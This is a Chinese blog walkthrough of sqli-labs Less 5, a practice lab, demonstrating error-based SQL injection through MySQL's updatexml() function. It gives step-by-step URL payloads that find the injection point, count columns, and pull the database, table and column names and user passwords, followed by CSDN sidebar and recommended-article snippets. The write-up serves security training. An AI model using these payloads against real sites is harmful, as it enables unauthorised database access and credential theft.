【sqli-labs】Less 5——报错注入(updatexml()函数)

最新推荐文章于 2024-07-25 17:06:50 发布
最新推荐文章于 2024-07-25 17:06:50 发布
阅读量2k 收藏 7
点赞数 5
分类专栏: 靶场和漏洞练习 #sqli-labs 文章标签: mysql web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131352106
版权

打开第五关页面,提示给id赋值可查询出对应的数据,存在可变参数id,注入可能存在。
在这里插入图片描述

1、判断注入点及注入类型
?id=1 页面正常
在这里插入图片描述
?id=1’ 加入单引号,页面报错
在这里插入图片描述
基本确定为单引号注入。
?id=1’and 1=1 %23 页面正常
?id=1’and 1=2 %23 页面异常
至此,说明注入点为id参数,且为字符型单引号注入。

2、判断字段数
逐步采用二分法进行列数判断
?id=1’ order by 3%23 页面正常在这里插入图片描述
?id=1’ order by 4%23 页面报错
在这里插入图片描述
由此确定,字段数为3。

3、判断回显位置
联合查询union select,这里注意要让前面的查询报错,这样页面在联合查询的情况下,会显示出后半部分查询出来的数据,如本题中在ID前面加个负号,因为id值不为负。这样前面出错的情况下,就可以查询出后面数据的回显位置。
?id=-1’ union select 1,2,3%23在这里插入图片描述
最担心的事情还是发生了,这一关和前面的4关都有所不同,没有办法通过联合查询来确定页面的回显位置,因为页面根本没有回显,只要正常情况下的操作,都只会显示You are in……
这里我们联想到报错时会有相应的报错信息显示在页面上,那么我们是否可以在报错信息当中爆出数据库的信息呢,这样不就可以回显在页面上了吗?
按照这样的思路,我们需要用到报错注入的方法。

4、报错注入
1)什么是报错注入?
报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。简单点说,就是在可以进行sql注入的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息
2)常用报错函数

  • updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数
  • extractvalue() 是mysql对xml文档数据进行查询的xpath函数
  • floor() mysql中用来取整的函数
  • exp() 此函数返回e(自然对数的底)指数X的幂值

先百度学习了一下报错注入函数的用法,报错注入函数

updatexml报错注入–常用

原理:updatexml()函数实际上是去更新了XML文档,但是我们在xml文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则然后报错了,但是报错的时候它其实已经执行了那个子查询代码。

updatexml(xml_document,xpath_string,new_value)

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc1
第二个参数: XPath_string (Xpath格式的字符串),如果不了解Xpath语法,可以在网上查找教程。
第三个参数: new_value,String格式,替换查找到的符合条件的数据。

作用: 改变文档中符合条件的节点的值。

4、爆数据库,版本,当前数据库用户等信息
id=1’ and updatexml(1,concat(0x3e,database()),1)–+在这里插入图片描述
数据库:security
在这里插入图片描述
版本:5.5.53

5、爆数据库中表名

?id=1' and updatexml(1,concat(0x3e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x3e),1)--+

在这里插入图片描述

得到数据库中的表有:emails,referers,uagents,users。

6、查询指定表users中的列名

?id=1' and updatexml(1,concat(0x3e,(select group_concat(column_name) from information_schema.columns where table_schema='security'  and table_name='users'),0x3e),1)--+

在这里插入图片描述

users表中的列名有id,username,password。

7、查询users表中的数据

?id=1' and updatexml(1,concat(0x3e,(select password from users limit 1a,1),0x3e),1)%23

在这里插入图片描述
注意回显数据超过一行,无法显示,需要使用limit函数,只读取一个。
这里使用其他报错注入函数进行注入也是OK的!

Coisini话不投机养乐多
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
安装之前,务必先了解可能遇到的问题,例如初始化数据库时连接不上的问题和 mysqli_connect 函数报错的问题。 知识点 3: sqli-labs 下载和配置 下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好...
sqli-labs实验指导手册
11-17
4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接的输出,也可以通过错误消息来获取信息。 - **组合使用`concat`和特殊字符**(如0x7e代表~)来构建查询并捕获结果。 5. **SQL注入...
SQL注入——UpdateXml报错注入
heyingcheng的博客
03-07 419
正常句式:select updatexml(doc,'/book/author/surname','1') from xml;错误句式:select updatexml(doc,'~book/author/surname','1') from xml;第一个参数:XML_document是string格式,为XML文档对象的名称,例如Doc。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第二个参数:XPath_string是路径,XPath格式的字符串。
SQL注入之updatexml报错注入函数解释)
m0_74608722的博客
06-05 528
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
floor()函数可以与group by和rand()函数联用来进行报错注入。报错原理:floor()函数与group by联用时,如果临时表中没有该主键,则在插入前会计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中...
SQLi-LABS Page-1(Basic Challenges)1-22关
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22关详解 #### Less1: GET 字符串型基于错误的单引号的注入 在本关中,我们需要利用一个带有`id`参数的GET请求来进行SQL注入。当尝试输入`id=1`时,并在URL末尾添加单...
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
mysql中提供的函数
m0_62943934的博客
07-25 866
MySQL 是一个功能强大的关系型数据库管理系统,其中包含了丰富的内置函数,用于处理各种数据操作和查询。这些函数可以分为多种类型,包括字符串函数、数值函数、日期和时间函数、聚合函数以及控制流函数。本文将介绍这些常用的 MySQL 函数,帮助您更好地利用 MySQL 进行数据操作和分析。流程函数也是很常用的一类函数,可以在SQL语句中实现条件筛选,从而提高语句的效率。介绍:将一列数据作为一个整体,进行纵向计算。注意 : NULL值是不参与所有聚合函数运算的。来保持与其他数据库系统的一致性。
mysql定时备份
yandong634的专栏
07-25 369
注意:导出需要在数据库的my.ini文件中配置数据库用户和密码。右键【任务计划程序库】-》【创建基本任务】或【创建任务】在C盘新建文件夹【mysql-backup】和【bk】在【bk】下新建文件【backup.bat】在windows里面搜索【任务计划程序】
mysql 如何实现重复数据取创建时间的最后一条记录?
Do_LaLi的博客
07-25 277
思路:按重复的字段通过group by 去重,重复的数据通过GROUP_CONCAT()函数收集,再通过SUBSTRING_INDEX()函数截取即可。
MySQL第一阶段:多表查询、事务
2301_80304567的博客
07-24 662
数据库的事务是一种机制、一个操作序列,包含了一组数据库操作命令事务把所有的命令作为一个整体一起向系统提交或撤销操作请求,即这一组数据库命令要么同时成功,要么同时失败事务是一个不可分割的工作逻辑单元python 中事务的提交不是自动的,MySQL 的事务是自动提交的。
Mysql的索引
2401_84592402的博客
07-24 747
索引是一个排序的列表,在列表当中存储索引的值以及索引对应数据所在的物理行索引值和数据是一个映射关系。
MySQL:送分or送命 varchar(30) 与 int(10)
在那一刻,我们或许会发现自己站在了时间的另一岸,以更加成熟和宽广的胸怀,去拥抱那份隔代相传的深情。
07-24 1345
显示宽度并不限制字段中能够存储的值的范围或精度,而是指定了某些SQL客户端工具或应用程序在显示该字段的值时可能会使用的最小字符宽度。然而,这个特性并不是所有客户端或应用程序都会遵循的,它更多是一种建议或提示。用于存储最多30个字符的可变长度字符串。INT(10)用于存储整数值,括号中的10主要是一个显示宽度的提示,对存储的整数值没有实际影响。在设计数据库表时,应该根据实际需要选择合适的字段类型和长度,而不是过分关注显示宽度的概念。
MySQL流量分析
qq_69100706的博客
07-24 577
MySQL流量分析通常指的是对MySQL数据库服务器的网络通信流量进行监测和分析,以了解数据交换的模式、性能瓶颈、安全性问题及潜在的优化机会。通过综合使用这些工具和技术,可以深入了解MySQL数据库的运行状况,及时发现和解决问题,优化数据库性能,保障数据安全
Mysql的主从复制和读写分离
2401_84592402的博客
07-24 732
主从复制:面试必问 主从复制的原理读写分离 MHA。
MySQL的存储过程
最新发布
2402_84844434的博客
07-25 1160
完成特定功能的sql语句的集合。把定义好的sql集合在一个特定的sql函数中每次执行调用函数即可。还可以实现传参的调用。
Mysql高阶语句
2401_84592402的博客
07-24 584
去重查询 : distinct。
MySQL:增删改查、临时表、授权相关示例
变成我......
07-24 989
Linux系统下MySQL服务的增删改查、临时表、授权相关实例,以及相关概念的讲解
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值